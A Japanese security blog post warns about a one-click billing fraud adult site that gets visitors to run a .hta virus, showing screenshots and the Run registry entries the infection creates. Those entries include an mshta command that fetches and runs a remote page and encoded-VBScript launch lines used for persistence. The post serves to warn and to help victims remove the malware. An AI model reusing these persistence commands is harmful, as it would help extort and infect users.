ノートパソコン dynabook が 
5万円台から♪「アダルト動画プロムナード」なるアダルトサイトがあるらしく、ワンクリック詐欺サイトについて扱ってるページに検索エンジン経由でアクセスがあったことがアクセス解析データに・・・。
↓
http://i41.tinypic.com/20krae0.jpg
規約同意確認場面
規約同意確認場面
↓
http://i41.tinypic.com/4hw1s6.jpg
ウイルス実行確認場面
ウイルス実行確認場面
動画の拡張子ではない「*.hta」なる拡張子を持った怪しいファイルですが、このコンピュータウイルスを自ら実行してわざわざ感染させるユーザーさんなんている? 
<アダルト動画プロムナード キャンペーンのご案内って?
<アダルト動画プロムナード キャンペーンのご案内って?
レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
4 つのデータを確認しました
【キー4】
名前: scrufty74727_977366625
データ: "C:\windows\system32\mshta" h**p://017e.*****.info/ayr4/qEirEvIy2I0r3sbqDlhJgQ.htm
【キー3】
名前: hrivacy hationale
データ: "C:\Users\[ユーザー名]\AppData\Roaming\Media Center Programs\hationale.lnk"
└ C:\Users\[ユーザー名]\AppData\Roaming\EBookSys\vvinMgr.exe //B //E:VBScript.Encode "C:\Users\[ユーザー名]\AppData\Roaming\FireShot\postulate786Ub"
【キー2】
名前: hrderblmmish
データ: "C:\Users\[ユーザー名]\AppData\Roaming\Media Center Programs\hationale.lnk"
└ C:\Users\[ユーザー名]\AppData\Roaming\EBookSys\vvinMgr.exe //B //E:VBScript.Encode "C:\Users\[ユーザー名]\AppData\Roaming\FireShot\postulate786Ub"
【キー1】
名前: grasly strpll
データ: "C:\Users\[ユーザー名]\AppData\Roaming\Media Center Programs\hationale.lnk"
└ C:\Users\[ユーザー名]\AppData\Roaming\EBookSys\vvinMgr.exe //B //E:VBScript.Encode "C:\Users\[ユーザー名]\AppData\Roaming\FireShot\postulate786Ub"
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v120221
http://blogs.yahoo.co.jp/noooo_spam/59949792.html
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
- ワンクリック料金請求にご用心 (警視庁)
http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku35.htm - 【注意喚起】 ワンクリック請求に関する相談急増! パソコン利用者にとっての対策は、まずは手口を知ることから! (情報処理推進機構)
http://www.ipa.go.jp/security/topics/alert20080909.html
